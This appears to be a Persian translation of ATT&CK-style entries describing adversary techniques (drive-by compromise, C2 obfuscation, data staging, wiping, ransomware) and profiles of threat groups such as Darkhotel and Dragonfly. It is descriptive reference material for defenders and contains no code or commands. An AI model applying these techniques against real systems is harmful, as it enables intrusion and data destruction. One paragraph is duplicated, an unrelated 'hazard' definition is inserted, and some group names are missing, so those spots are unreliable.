دشمنان ممکن است گواهی‌های SSL/TLS خود امضا شده را ایجاد کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. گواهینامه‌های SSL/TLSبرای القای اعتماد طراحی شده اند. آنها شامل اطلاعاتی درباره کلید، اطلاعاتی در مورد هویت مالک آن و امضای دیجیتالی نهادی است که صحت محتوای گواهی را تأیید کرده است. اگر امضا معتبر باشد و شخصی که گواهی را بررسی می‌کند به امضاکننده اعتماد کند، می‌داند که می‌تواند از آن کلید برای برقراری ارتباط با صاحب آن استفاده کند. در مورد خودامضا، گواهی‌های دیجیتال فاقد عنصر اعتماد مرتبط با امضای یک مرجع گواهی شخص ثالث (CA) خواهند بود. دشمنان ممکن است گواهی‌های SSL/TLS با امضای خود را ایجاد کنند که می‌تواند برای پیشبرد عملیات‌هایشان استفاده شود، مانند رمزگذاری ترافیک C2 (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب) یا حتی فعال کردن Adversary-in-the-Middle اگر به ریشه اعتماد اضافه شود. (یعنی نصب گواهی ریشه). پس از ایجاد یک گواهی دیجیتال، دشمن ممکن است آن گواهی را روی زیرساخت های تحت کنترل خود نصب کند.

دشمنان ممکن است اکسپلویت‌هایی ایجاد کنند که می‌تواند در هنگام هدف گیری مورد استفاده قرار گیرد. یک اکسپلویت از یک باگ یا آسیب‌پذیری به منظور ایجاد رفتار ناخواسته یا پیش بینی نشده در سخت افزار یا نرم افزار رایانه استفاده می‌کند. به جای یافتن/تغییر اکسپلویت‌ها از آنلاین یا خرید آنها از فروشندگان اکسپلویت، دشمن ممکن است اکسپلویت‌های خود را توسعه دهد. دشمنان ممکن است از اطلاعات به دست آمده از طریق آسیب‌پذیری‌ها برای تمرکز بر تلاش‌های توسعه بهره‌برداری استفاده کنند. به عنوان بخشی از فرآیند توسعه اکسپلویت، دشمنان ممکن است آسیب‌پذیری‌های قابل بهره‌برداری را از طریق روش‌هایی مانند تجزیه و تحلیل فازی و پچ کشف کنند. همانند تلاش‌های توسعه مشروع، ممکن است مجموعه مهارت‌های متفاوتی برای توسعه بهره‌برداری مورد نیاز باشد. مهارت‌های مورد نیاز ممکن است در داخل خانه قرار داشته باشند، یا ممکن است نیاز به قرارداد داشته باشند. استفاده از یک پیمانکار ممکن است گسترش قابلیت‌های توسعه بهره‌برداری آن دشمن در نظر گرفته شود، مشروط بر اینکه دشمن در شکل‌دهی نیازمندی‌ها نقش داشته باشد و درجه اولیه انحصار را برای بهره‌برداری حفظ کند. دشمنان ممکن است از اکسپلویت‌ها در طول مراحل مختلف چرخه حیات دشمن استفاده کنند (یعنی بهره برداری از برنامه عمومی، بهره برداری برای اجرای مشتری، بهره برداری برای افزایش امتیاز، بهره برداری برای فرار دفاعی، بهره برداری برای دسترسی به اعتبار، بهره برداری از خدمات از راه دور، و سیستم بهره برداری یا بهره برداری) .

دشمنان ممکن است از طریق بازدید کاربر از یک وب سایت در طول دوره عادی مرور، به یک سیستم دسترسی پیدا کنند. با این تکنیک، مرورگر وب کاربر معمولاً برای بهره برداری هدف قرار می‌گیرد، اما دشمنان همچنین ممکن است از وب سایت های در معرض خطر برای رفتارهای غیر بهره برداری مانند به دست آوردن توکن دسترسی به برنامه استفاده کنند. راه های مختلفی برای تحویل کد اکسپلویت به مرورگر وجود دارد، از جمله: در جایی که دشمنان نوعی کد مخرب مانند جاوا اسکریپت، iFrames و اسکریپت بین سایتی را تزریق کرده‌اند، یک وب سایت قانونی به خطر می افتد. تبلیغات مخرب از طریق ارائه دهندگان تبلیغات قانونی پرداخت می شود و ارائه می شود. رابط های برنامه وب داخلی برای درج هر نوع شی دیگری که می تواند برای نمایش محتوای وب استفاده شود یا حاوی اسکریپتی باشد که روی مشتری بازدیدکننده اجرا می شود (مانند پست های انجمن، نظرات و سایر محتوای وب قابل کنترل توسط کاربر) استفاده می شود. اغلب وب‌سایتی که توسط یک دشمن استفاده می‌شود، وب‌سایتی است که توسط یک جامعه خاص مانند دولت، یک صنعت خاص یا منطقه بازدید می‌شود، که در آن هدف به خطر انداختن یک کاربر خاص یا مجموعه‌ای از کاربران بر اساس منافع مشترک است. این نوع حمله هدفمند به یک حمله استراتژیک وب اطلاق می شود. چندین نمونه شناخته شده از این اتفاق وجود دارد. فرآیند سازش درایو- بای معمولی: کاربر از وب سایتی بازدید می کند که برای میزبانی محتوای کنترل شده دشمن استفاده می شود. اسکریپت‌ها به طور خودکار اجرا می‌شوند، معمولاً نسخه‌های مرورگر و افزونه‌ها را برای نسخه بالقوه آسیب پذیر جستجو می‌کنند. ممکن است از کاربر خواسته شود که با فعال کردن اسکریپت یا اجزای وب سایت فعال و نادیده گرفتن کادرهای محاوره ای هشدار در این فرآیند کمک کند. پس از یافتن نسخه آسیب پذیر، کد اکسپلویت به مرورگر تحویل داده می شود. در صورت موفقیت آمیز بودن بهره برداری، کد حریف را در سیستم کاربر اجرا می کند مگر اینکه حفاظت‌های دیگری وجود داشته باشد. در برخی موارد، بازدید دوم از وب سایت پس از اسکن اولیه، قبل از تحویل کد اکسپلویت لازم است. بر خلاف Exploit Public-Facing Application، تمرکز این تکنیک، بهره‌برداری از نرم افزار در نقطه پایانی مشتری پس از بازدید از یک وب سایت است. این معمولاً به دشمن اجازه می دهد به سیستم های موجود در شبکه داخلی به جای سیستم‌های خارجی که ممکن است در یک DMZ باشند، دسترسی پیدا کند. همچنین ممکن است دشمنان از وب‌سایت‌های در معرض خطر استفاده کنند تا کاربر را به برنامه‌ای مخربی که برای سرقت توکن‌های دسترسی برنامه‌ها، مانند توکن‌های OAuth طراحی شده است، تحویل دهند تا به برنامه‌ها و اطلاعات محافظت شده دسترسی پیدا کنند. این برنامه های مخرب از طریق پنجره های بازشو در وب سایت های قانونی ارائه شده اند.

دشمنان ممکن است یک کانتینر را در محیطی برای تسهیل اجرا یا فرار از دفاع مستقر کنند. در برخی موارد، دشمنان ممکن است یک کانتینر جدید را برای اجرای فرآیندهای مرتبط با یک تصویر یا استقرار خاص، مانند فرآیندهایی که بدافزار را اجرا یا دانلود می‌کنند، مستقر کنند. در برخی دیگر، یک دشمن ممکن است یک کانتینر جدید پیکربندی شده بدون قوانین شبکه، محدودیت های کاربر و غیره را برای دور زدن دفاع های موجود در محیط مستقر کند. کانتینرها را می توان با ابزارهای مختلفی مانند از طریق ایجاد و راه‎اندازی APIهای Docker یا از طریق یک برنامه وب مانند داشبورد Kubernetes یا Kubeflow مستقر کرد. دشمنان ممکن است کانتینرهایی را بر اساس تصاویر مخرب بازیابی یا ساخته شده یا از تصاویر بدخیم که بارهای مخرب را در زمان اجرا دانلود و اجرا می کنند، مستقر کنند.

شرایطی است که دارای پتانسیل صدمه به افراد، آسیب رسانی به تجهیزات، از بین بردن مواد یا کاهش کارآیی در انجام یک عمل از پیش تعیین شده باشد. به همین ترتیب می توان گفت خطر شرایطی است که تماس نامطلوب با یک منبع انرژی را فراهم میکند (خطرات بالقوه).

دشمنان ممکن است از فایل‌های مبهم یا اطلاعات برای مخفی کردن مصنوعات یک نفوذ از تجزیه و تحلیل استفاده کنند. آنها ممکن است به مکانیسم های جداگانه ای برای رمزگشایی یا ابهام زدایی آن اطلاعات نیاز داشته باشند، بسته به اینکه چگونه قصد استفاده از آن را دارند. روش‌هایی برای انجام این کار شامل عملکرد داخلی بدافزار یا استفاده از ابزارهای موجود در سیستم است. یکی از این نمونه ها استفاده از certutil برای رمزگشایی یک فایل اجرایی قابل حمل ابزار دسترسی از راه دور است که در یک فایل گواهی پنهان شده است. مثال دیگر استفاده از دستور Windows copy /b برای مونتاژ مجدد قطعات باینری در یک بار مخرب است. گاهی اوقات ممکن است برای باز کردن آن برای رفع ابهام یا رمزگشایی به عنوان بخشی از اجرای کاربر، اقدام کاربر مورد نیاز باشد. همچنین ممکن است از کاربر خواسته شود که یک رمز عبور برای باز کردن یک فایل فشرده/رمزگذاری شده محافظت شده با رمز عبور که توسط دشمن ارائه شده است وارد کند.

دشمنان ممکن است یک کانتینر را در محیطی برای تسهیل اجرا یا فرار از دفاع مستقر کنند. در برخی موارد، دشمنان ممکن است یک کانتینر جدید را برای اجرای فرآیندهای مرتبط با یک تصویر یا استقرار خاص، مانند فرآیندهایی که بدافزار را اجرا یا دانلود می‌کنند، مستقر کنند. در برخی دیگر، یک دشمن ممکن است یک کانتینر جدید پیکربندی شده بدون قوانین شبکه، محدودیت های کاربر و غیره را برای دور زدن دفاع های موجود در محیط مستقر کند. کانتینرها را می‌توان با روش‌های مختلف، از جمله از طریق ایجاد و راه‌اندازی APIهای Docker یا از طریق یک برنامه وب مانند داشبورد Kubernetes یا Kubeflow مستقر کرد. دشمنان ممکن است کانتینرهایی را بر اساس تصاویر مخرب بازیابی یا ساخته شده یا از تصاویر بدخیم که بارهای مخرب را در زمان اجرا دانلود و اجرا می کنند، مستقر کنند.

دشمنان ممکن است مستقیماً به یک حجم برای دور زدن کنترل های دسترسی به فایل و نظارت بر سیستم فایل دسترسی داشته باشند. ویندوز به برنامه ها امکان دسترسی مستقیم به حجم های منطقی را می دهد. برنامه هایی با دسترسی مستقیم ممکن است با تجزیه و تحلیل ساختارهای داده سیستم فایل، فایل ها را مستقیماً از درایو بخوانند و بنویسند. این تکنیک کنترل های دسترسی به فایل ویندوز و همچنین ابزارهای نظارت بر سیستم فایل را دور می زند. ابزارهایی مانند NinjaCopy برای انجام این اقدامات در PowerShell وجود دارد.

دشمنان ممکن است تنظیمات پیکربندی یک دامنه را برای فرار از دفاع و/یا افزایش امتیازات در محیط های دامنه تغییر دهند. دامنه ها ابزار متمرکزی را برای مدیریت نحوه عملکرد منابع رایانه ای (مثلاً رایانه ها، حساب های کاربری) و تعامل با یکدیگر در یک شبکه فراهم می کنند. خط مشی دامنه همچنین شامل تنظیمات پیکربندی است که ممکن است بین دامنه ها در یک محیط چند دامنه/جنگل اعمال شود. تغییرات در تنظیمات دامنه ممکن است شامل تغییر اشیاء خط مشی گروه دامنه (GPO) یا تغییر تنظیمات اعتماد برای دامنه‌ها، از جمله اعتمادهای فدراسیون باشد. با مجوزهای کافی، دشمنان می توانند تنظیمات خط مشی دامنه را تغییر دهند. از آنجایی که تنظیمات پیکربندی دامنه بسیاری از تعاملات درون محیط اکتیو دایرکتوری (AD) را کنترل می‌کند، تعداد زیادی از حملات بالقوه وجود دارد که می‌تواند از این سوء استفاده ناشی شود. نمونه‌هایی از این سوءاستفاده‌ها عبارتند از اصلاح GPOها برای فشار دادن یک کار برنامه‌ریزی شده مخرب به رایانه‌ها در سراسر محیط دامنه یا تغییر اعتمادهای دامنه برای گنجاندن یک دامنه کنترل‌شده توسط دشمن که در آن می‌توانند نشانه‌های دسترسی را کنترل کنند که متعاقباً توسط آن‌ها پذیرفته می‌شود. منابع دامنه قربانی. دشمنان همچنین می توانند تنظیمات پیکربندی را در محیط AD تغییر دهند تا یک کنترل کننده دامنه سرکش را پیاده سازی کنند. دشمنان ممکن است به طور موقت خط مشی دامنه را تغییر دهند، یک اقدام مخرب انجام دهند و سپس تغییر را برای حذف شاخص های مشکوک برگردانند.

دشمنان ممکن است سعی کنند اطلاعاتی را در مورد روابط اعتماد دامنه جمع‌آوری کنند که ممکن است برای شناسایی فرصت‌های حرکت جانبی در محیط‌های چند دامنه/جنگل ویندوز استفاده شود. Domain Trust مکانیزمی را برای یک دامنه فراهم می کند تا امکان دسترسی به منابع را بر اساس رویه های احراز هویت یک دامنه دیگر فراهم کند. تراست های دامنه به کاربران دامنه مورد اعتماد امکان دسترسی به منابع موجود در دامنه اعتماد را می دهد. اطلاعات کشف شده ممکن است به دشمن کمک کند تا SID-History Injection، Pass the Ticket و Kerberoasting را انجام دهد. اعتماد دامنه را می توان با استفاده از فراخوانی DSEnumerateDomainTrusts() Win32 API ، متدهای .NET و LDAP شمارش کرد. ابزار Windows Nltest شناخته شده است که توسط دشمنان برای شمارش اعتماد دامنه استفاده می شود.

دشمنان ممکن است به اشیاء داده از فضای ذخیره سازی ابری که به درستی ایمن نشده اند دسترسی پیدا کنند. بسیاری از ارائه دهندگان خدمات ابری راه حل هایی را برای ذخیره سازی داده های آنلاین مانند Amazon S3, Azure Storage, and Google Cloud Storageارائه می دهند. این راه‌حل‌ها با دیگر راه‌حل‌های ذخیره‌سازی (مانند SQL یا Elasticsearch) از این جهت متفاوت هستند که هیچ برنامه جامعی وجود ندارد. داده های این راه حل ها را می توان مستقیماً با استفاده از APIهای ارائه دهنده ابر بازیابی کرد. ارائه دهندگان راه حل معمولاً راهنماهای امنیتی را برای کمک به کاربران نهایی در پیکربندی سیستم ها ارائه می دهند.پیکربندی نادرست توسط کاربران نهایی یک مشکل رایج است. حوادث متعددی وجود داشته است که ذخیره سازی ابری به طور نامناسب ایمن شده است (معمولاً با اجازه دسترسی غیر عمدی عمومی توسط کاربران احراز هویت نشده یا دسترسی بیش از حد گسترده توسط همه کاربران)، اجازه دسترسی آزاد به کارت های اعتباری، اطلاعات شناسایی شخصی، سوابق پزشکی و سایر اطلاعات حساس. همچنین ممکن است دشمنان به عنوان راهی برای دسترسی به اشیاء ذخیره‌سازی ابری که دارای کنترل‌های مجوز دسترسی هستند، اعتبارنامه‌های افشا شده را در مخازن منبع، گزارش‌ها یا ابزارهای دیگر به دست آورند.

دشمنان ممکن است داده های مربوط به دستگاه های مدیریت شده را از مخازن پیکربندی جمع آوری کنند. مخازن پیکربندی توسط سیستم های مدیریتی به منظور پیکربندی، مدیریت و کنترل داده ها در سیستم های راه دور استفاده می شود. مخازن پیکربندی همچنین ممکن است دسترسی از راه دور و مدیریت دستگاه ها را تسهیل کنند. دشمنان ممکن است این مخازن را به منظور جمع آوری مقادیر زیادی از داده های حساس مدیریت سیستم مورد هدف قرار دهند. داده‌های مخازن پیکربندی ممکن است توسط پروتکل‌ها و نرم‌افزارهای مختلف در معرض دید قرار گیرند و می‌توانند طیف گسترده‌ای از داده‌ها را ذخیره کنند، که بسیاری از آنها ممکن است با اهداف Discovery دشمن همسو باشند.

دشمنان ممکن است از مخازن اطلاعات برای استخراج اطلاعات ارزشمند استفاده کنند. مخازن اطلاعات ابزارهایی هستند که امکان ذخیره سازی اطلاعات را فراهم می کنند، معمولاً برای تسهیل همکاری یا اشتراک اطلاعات بین کاربران، و می توانند طیف گسترده ای از داده ها را ذخیره کنند که ممکن است به دشمنان در اهداف بعدی یا دسترسی مستقیم به اطلاعات هدف کمک کند. همچنین ممکن است دشمنان از ویژگی های اشتراک خارجی برای به اشتراک گذاشتن اسناد حساس با گیرندگان خارج از سازمان سوء استفاده کنند. در زیر لیست مختصری از نمونه اطلاعاتی است که ممکن است ارزش بالقوه ای برای یک دشمن داشته باشد و همچنین ممکن است در یک مخزن اطلاعات یافت شود: سیاست ها، رویه ها و استانداردها نمودارهای فیزیکی / منطقی شبکه نمودارهای معماری سیستم مستندات سیستم فنی اعتبار تست / توسعه زمانبندی کار / پروژه قطعه کد منبع پیوندهایی به اشتراک‌های شبکه و سایر منابع داخلی اطلاعات ذخیره شده در یک مخزن ممکن است بر اساس نمونه یا محیط خاص متفاوت باشد. مخازن اطلاعات مشترک خاص شامل پلتفرم های مبتنی بر وب مانند Sharepoint و Confluence، سرویس های خاص مانند مخازن کد، پایگاه های داده IaaS، پایگاه های داده سازمانی و سایر زیرساخت های ذخیره سازی مانند SQL Server است.

دشمنان ممکن است منابع سیستم محلی مانند سیستم های فایل یا پایگاه های داده محلی را جستجو کنند تا فایل های مورد علاقه و داده های حساس را قبل از Exfiltration پیدا کنند. دشمنان ممکن است این کار را با استفاده از یک مترجم دستور و اسکریپت، مانند cmd انجام دهند، که قابلیت تعامل با سیستم فایل برای جمع آوری اطلاعات را دارد. برخی از دشمنان نیز ممکن است از Automated Collection در سیستم محلی استفاده کنند.

دشمنان ممکن است اشتراک‌های شبکه را در رایانه‌هایی که به خطر انداخته‌اند جستجو کنند تا فایل‌های مورد علاقه خود را پیدا کنند. داده‌های حساس را می‌توان از سیستم‌های راه دور از طریق درایوهای شبکه مشترک (دایرکتوری مشترک میزبان، سرور فایل شبکه، و غیره) که از سیستم فعلی قبل از Exfiltration قابل دسترسی هستند، جمع‌آوری کرد. ممکن است از پوسته‌های فرمان تعاملی استفاده شود، و از عملکرد رایج در cmd ممکن است برای جمع‌آوری اطلاعات استفاده شود.

دشمنان ممکن است رسانه‌های قابل جابجایی متصل را در رایانه‌هایی که به خطر انداخته‌اند جستجو کنند تا فایل‌های مورد علاقه خود را پیدا کنند. داده های حساس را می توان از هر رسانه قابل جابجایی (درایو دیسک نوری، حافظه USBو غیره) که قبل از Exfiltration به سیستم در معرض خطر متصل شده است، جمع آوری کرد. ممکن است از پوسته‌های فرمان تعاملی استفاده شود، و از عملکرد رایج در cmd ممکن است برای جمع‌آوری اطلاعات استفاده شود. برخی از دشمنان ممکن است از مجموعه خودکار در رسانه های قابل جابجایی نیز استفاده کنند.

دشمنان ممکن است داده‌های جمع‌آوری‌شده را قبل از Exfiltration در یک مکان یا فهرست مرکزی مرحله‌بندی کنند. داده ها ممکن است در فایل های جداگانه نگهداری شوند یا از طریق تکنیک هایی مانند آرشیو داده های جمع آوری شده در یک فایل ترکیب شوند. ممکن است از پوسته‌های فرمان تعاملی استفاده شود، و عملکرد رایج در cmd و bash ممکن است برای کپی کردن داده‌ها در یک مکان مرحله‌بندی استفاده شود.در محیط‌های ابری، دشمنان ممکن است داده‌ها را در یک نمونه خاص یا ماشین مجازی قبل از استخراج، مرحله‌بندی کنند. حریف ممکن است Cloud Instance ایجاد کند و داده ها را در آن نمونه مرحله بندی کند. دشمنان ممکن است انتخاب کنند که داده ها را از یک شبکه قربانی در یک مکان متمرکز قبل از Exfiltration مرحله بندی کنند تا تعداد اتصالات ایجاد شده به سرورC2 خود را به حداقل برسانند و از شناسایی بهتر فرار کنند.

دشمنان ممکن است داده ها را رمزگذاری کنند تا محتوای ترافیک فرمان و کنترل را دشوارتر کنند. اطلاعات فرمان و کنترل (C2) را می توان با استفاده از یک سیستم رمزگذاری داده استاندارد کدگذاری کرد. استفاده از رمزگذاری داده‌ها ممکن است مطابق با مشخصات پروتکل موجود باشد و شامل استفاده از ASCII، Unicode، Base64,MIME یا دیگر سیستم‌های کدگذاری باینری به متن و کاراکتر می‌شود. برخی از سیستم های رمزگذاری داده ها نیز ممکن است منجر به فشرده سازی داده ها شوند، مانند gzip.

دشمنان ممکن است فرمان و کنترل ترافیک را مخدوش کنند تا تشخیص آن را دشوارتر کنند. ارتباطات فرماندهی و کنترل مخفی هستند (اما نه لزوماً رمزگذاری شده) در تلاشی برای دشوارتر کردن محتوا برای کشف یا رمزگشایی و ایجاد ارتباط کمتر آشکار و پنهان کردن دستورات از دیده شدن. این روش‌های بسیاری را شامل می‌شود، مانند افزودن داده‌های ناخواسته به ترافیک پروتکل، استفاده از steganography، یا جعل هویت پروتکل‌های قانونی.

دشمنان ممکن است به صورت پویا با زیرساخت‌های فرماندهی و کنترل ارتباط برقرار کنند تا از تشخیص‌ها و اصلاحات رایج اجتناب کنند. این ممکن است با استفاده از بدافزاری که الگوریتم مشترکی با زیرساختی که دشمن برای دریافت ارتباطات بدافزار استفاده می‌کند، به اشتراک می‌گذارد. این محاسبات را می توان برای تنظیم پویا پارامترهایی مانند نام دامنه، آدرس IP یا شماره پورت مورد استفاده بدافزار برای فرمان و کنترل استفاده کرد. دشمنان ممکن است از وضوح پویا برای هدف کانال های بازگشتی استفاده کنند. هنگامی که تماس با فرمان و کنترل اولیه سرور مخرب از بین می رود، ممکن است از وضوح پویا به عنوان وسیله ای برای برقراری مجدد فرمان و کنترل استفاده کند.

دشمن ممکن است داده ها را به جای فایل های کامل در قطعات با اندازه ثابت استخراج کند یا اندازه بسته ها را زیر آستانه های خاص محدود کند. این رویکرد ممکن است برای جلوگیری از ایجاد هشدار آستانه انتقال داده شبکه استفاده شود.

دشمنان ممکن است داده ها و فایل ها را در سیستم های خاص یا به تعداد زیاد در یک شبکه از بین ببرند تا دسترسی به سیستم ها، خدمات و منابع شبکه را قطع کنند. تخریب داده‌ها احتمالاً داده‌های ذخیره‌شده را با تکنیک‌های پزشکی قانونی از طریق بازنویسی فایل‌ها یا داده‌ها در درایوهای محلی و راه دور غیرقابل بازیابی می‌کند. دستورات رایج حذف فایل های سیستم عامل مانند del و rm اغلب فقط نشانگرهای فایل ها را بدون پاک کردن محتویات خود فایل ها حذف می کنند و فایل ها را با روش پزشکی قانونی مناسب قابل بازیابی می کنند. این رفتار با Disk Content Wipe و Disk Structure Wipe متمایز است، زیرا فایل های فردی به جای بخش هایی از دیسک ذخیره سازی یا ساختار منطقی دیسک، از بین می روند.دشمنان ممکن است تلاش کنند تا فایل‌ها و دایرکتوری‌ها را با داده‌های تولید شده به‌طور تصادفی بازنویسی کنند تا آن‌ها را غیرقابل بازیابی کنند. در برخی موارد از فایل‌های تصویری سیاسی جهت بازنویسی داده‌ها استفاده شده است. برای به حداکثر رساندن تأثیر بر سازمان هدف در عملیاتی که هدف قطع دسترسی در سطح شبکه است، بدافزار طراحی شده برای از بین بردن داده ها ممکن است دارای ویژگی های کرم مانند برای انتشار در سراسر شبکه با استفاده از تکنیک های اضافی مانند حساب های معتبر، تخلیه اعتبار سیستم عامل، و SMB/ باشد.

دشمنان ممکن است داده ها را در سیستم های هدف یا تعداد زیادی از سیستم ها در یک شبکه رمزگذاری کنند تا دسترسی به سیستم و منابع شبکه را قطع کنند. آنها می توانند با رمزگذاری فایل ها یا داده ها در درایوهای محلی و راه دور و ممانعت از دسترسی به یک کلید رمزگشایی، سعی کنند داده های ذخیره شده را غیرقابل دسترسی نشان دهند. این ممکن است به منظور دریافت غرامت پولی از قربانی در ازای رمزگشایی یا یک کلید رمزگشایی (باج‌افزار) یا غیرقابل دسترس کردن دائمی داده‌ها در مواردی که کلید ذخیره یا منتقل نشده است، انجام شود. در مورد باج افزار، معمول است که فایل های کاربر معمولی مانند اسناد آفیس، فایل های PDF، تصاویر، ویدئوها، فایل های صوتی، متن و کد منبع رمزگذاری می شوند. در برخی موارد، دشمنان ممکن است فایل‌های سیستم، پارتیشن‌های دیسک و MBR را رمزگذاری کنند.برای به حداکثر رساندن تأثیر بر سازمان هدف، بدافزار طراحی‌شده برای رمزگذاری داده‌ها ممکن است دارای ویژگی‌های کرم مانند برای انتشار در سراسر شبکه با استفاده از تکنیک‌های حمله دیگر مانند حساب‌های معتبر، تخلیه اعتبار سیستم‌عامل، و اشتراک‌های مدیریت SMB/Windows باشد.در محیط‌های ابری، اشیاء ذخیره‌سازی در حساب‌های در معرض خطر نیز ممکن است رمزگذاری شوند.

دشمنان ممکن است داده ها را به منظور دستکاری نتایج خارجی یا مخفی کردن فعالیت ها درج، حذف یا دستکاری کنند. با دستکاری داده ها، دشمنان ممکن است سعی کنند بر فرآیند کسب و کار، درک سازمانی یا تصمیم گیری تأثیر بگذارند.نوع اصلاح و تأثیری که خواهد داشت به کاربرد و فرآیند هدف و همچنین اهداف و مقاصد دشمن بستگی دارد. برای سیستم‌های پیچیده، یک دشمن احتمالاً به تخصص ویژه و احتمالاً دسترسی به نرم‌افزار تخصصی مرتبط با سیستم نیاز دارد که معمولاً از طریق یک کمپین طولانی جمع‌آوری اطلاعات به دست می‌آید تا تأثیر مطلوب داشته باشد.

دشمنان ممکن است محتوای بصری موجود در داخل یا خارج از یک شبکه سازمانی را تغییر دهند. دلایل Deacement شامل ارسال پیام، ارعاب، یا ادعای اعتبار (احتمالاً نادرست) برای نفوذ است. تصاویر آزاردهنده یا توهین‌آمیز ممکن است به عنوان بخشی از Defacement به منظور ایجاد ناراحتی در کاربر یا تحت فشار قرار دادن پیام‌های همراه مورد استفاده قرار گیرند.

دشمنان ممکن است داده های خام دیسک را در سیستم های خاص یا به تعداد زیاد در یک شبکه پاک یا خراب کنند تا دسترسی به سیستم و منابع شبکه را قطع کنند. با دسترسی مستقیم نوشتن به دیسک، دشمنان ممکن است سعی کنند بخشی از داده های دیسک را بازنویسی کنند. ممکن است دشمنان قسمت‌های دلخواه داده‌های دیسک را پاک کنند و/یا ساختارهای دیسک مانند رکورد اصلی راه‌اندازی ( MBR) را پاک کنند. ممکن است سعی شود تمام بخش‌های دیسک پاک شود. برای به حداکثر رساندن تأثیر بر سازمان هدف در عملیاتی که هدف آن قطع دسترسی در سراسر شبکه است، بدافزار مورد استفاده برای پاک کردن دیسک‌ها ممکن است دارای ویژگی‌های کرم مانند برای انتشار در سراسر شبکه با استفاده از تکنیک‌های اضافی مانند حساب‌های معتبر، تخلیه اعتبار سیستم‌عامل باشد.

Dark Caracal گروه تهدیدی است که به اداره کل امنیت عمومی لبنان ( GDGS) نسبت داده شده و حداقل از سال 2012 فعالیت داشته است.

Darkhotel یک گروه تهدید مظنون کره جنوبی است که حداقل از سال 2004 قربانیان را عمدتاً در شرق آسیا هدف قرار داده است. نام این گروه بر اساس عملیات جاسوسی سایبری است که از طریق شبکه‌های اینترنتی هتل‌ها علیه مدیران مسافر و سایر مهمانان منتخب انجام شده است. Darkhotel همچنین کمپین‌های spearphishing و قربانیان را از طریق شبکه‌های همتا به همتا و اشتراک‌گذاری فایل انجام داده است.

DarkHydrus یک گروه تهدید است که حداقل از سال 2016 آژانس‌های دولتی و موسسات آموزشی در خاورمیانه را هدف قرار داده است. این گروه به شدت از ابزارهای منبع باز و بارهای سفارشی برای انجام حملات استفاده می کند.

DarkVishnya یک عامل تهدید با انگیزه مالی است که موسسات مالی در اروپای شرقی را هدف قرار می دهد. در سال 2017-2018 این گروه به حداقل 8 بانک در این منطقه حمله کرد..

Deep Panda یک گروه تهدید کننده مشکوک چینی است که بسیاری از صنایع از جمله دولتی، دفاعی، مالی و مخابراتی را هدف قرار می دهد. نفوذ به شرکت مراقبت‌های بهداشتی Anthem به Deep Panda نسبت داده شده است. این گروه با نام‌های Shell Crew، WebMasters، KungFu Kittens و PinkPanther نیز شناخته می‌شود. Deep Panda همچنین به نظر می رسد به عنوان Black Vine بر اساس انتساب نام هر دو گروه به نفوذ Anthem شناخته می شود. برخی از تحلیلگران Deep Panda و را به عنوان یک گروه دنبال می‌کنند، اما اطلاعات منبع باز مشخص نیست که آیا گروه ها یکسان هستند یا خیر.

Dragonfly یک گروه جاسوسی سایبری است که حداقل از سال 2011 فعال بوده است. آنها در ابتدا شرکت های دفاعی و هوانوردی را هدف قرار دادند اما در اوایل سال 2013 تمرکز خود را روی بخش انرژی تغییر دادند. آنها همچنین شرکت های مرتبط با سیستم های کنترل صنعتی را هدف قرار داده اند. گروه مشابهی در سال 2015 ظهور کرد و توسط سیمانتک با نام . شناسایی شد. بحث بر سر میزان همپوشانی بین Dragonfly و وجود دارد، اما شواهد کافی وجود دارد که منجر به ردیابی آنها به عنوان دو گروه جداگانه شود.

Dragonfly 2.0یک گروه مشکوک روسی است که نهادهای دولتی و چندین بخش زیرساخت حیاتی ایالات متحده را حداقل از دسامبر 2015 هدف قرار داده است. بحث بر سر میزان همپوشانی بین Dragonfly 2.0و Dragonfly وجود دارد، اما شواهد کافی برای اثبات وجود دارد. منجر به ردیابی آنها به عنوان دو گروه جداگانه می شود.

DragonOK یک گروه تهدید است که سازمان های ژاپنی را با ایمیل های فیشینگ هدف قرار داده است. به دلیل همپوشانی TTPها، از جمله ابزارهای سفارشی مشابه، تصور می شود DragonOK ارتباط مستقیم یا غیرمستقیم با گروه تهدید Moafee دارد.

طوفان گرد و غبار یک گروه تهدید است که چندین صنعت را در ژاپن، کره جنوبی، ایالات متحده، اروپا و چندین کشور آسیای جنوب شرقی هدف قرار داده است.

فرار دفاعی شامل تکنیک هایی است که دشمنان برای جلوگیری از شناسایی در طول سازش خود از آنها استفاده می کنند. تکنیک های مورد استفاده برای فرار دفاعی شامل حذف/غیرفعال کردن نرم افزارهای امنیتی یا مبهم کردن/رمزگذاری داده ها و اسکریپت ها است.

کشف داده ها شامل شناسایی و مکان یابی داده های حساس یا تنظیم شده برای محافظت کافی یا حذف ایمن آن ها می شود. یکی از بزرگ‌ترین روندهای هوش تجاری در سال‌های اخیر، کشف داده‌ها، برای بسیاری از تیم‌های امنیتی سازمانی اولویت دارد، زیرا یک جزء حیاتی در آمادگی انطباق است.

سوءاستفاده یک برنامه یا قطعه کد است که برای یافتن و استفاده از نقص امنیتی یا آسیب‌پذیری در برنامه یا سیستم رایانه و معمولاً برای اهداف مخرب مانند نصب بدافزار طراحی شده است. سوء استفاده خود بدافزار نیست، بلکه روشی است که توسط مجرمان سایبری برای ارائه بدافزار استفاده می‌شود.

دشمنان ممکن است حساب‌هایی را با خدماتی که می‌توانند در طول هدف‌گیری استفاده شوند ایجاد کنند. دشمنان می‌توانند حساب‌هایی ایجاد کنند که بتوان از آنها برای ساختن شخصیت‌های مختلف برای عملیات‌های بعدی استفاده کرد. توسعه شخصی شامل توسعه اطلاعات عمومی، حضور، سابقه و وابستگی‌های مناسب است. این توسعه را می‌توان در رسانه‌های اجتماعی، وب‌سایت یا سایر اطلاعات در دسترس عموم که می‌توان در طول عملیات با استفاده از آن شخصیت یا هویت، ارجاع داد و برای مشروعیت آن مورد بررسی قرار داد، اعمال کرد. برای عملیاتی که شامل مهندسی اجتماعی می‌شود، استفاده از شخصیت آنلاین ممکن است مهم باشد. این پرسوناها ممکن است ساختگی باشند و یا جعل هویت افراد واقعی باشند. شخصیت ممکن است در یک سایت واحد یا در چندین سایت وجود داشته باشد (مثلاً: فیس بوک، لینکدین، توییتر، گوگل، گیت هاب، داکر هاب، و غیره). ایجاد یک شخصیت ممکن است مستلزم ایجاد اسناد اضافی باشد تا واقعی به نظر برسد. این می‌تواند شامل پر کردن اطلاعات نمایه، توسعه شبکه‌های اجتماعی، یا ترکیب عکس‌ها باشد. ایجاد حساب‌ها همچنین می‌تواند شامل ایجاد حساب‌هایی با 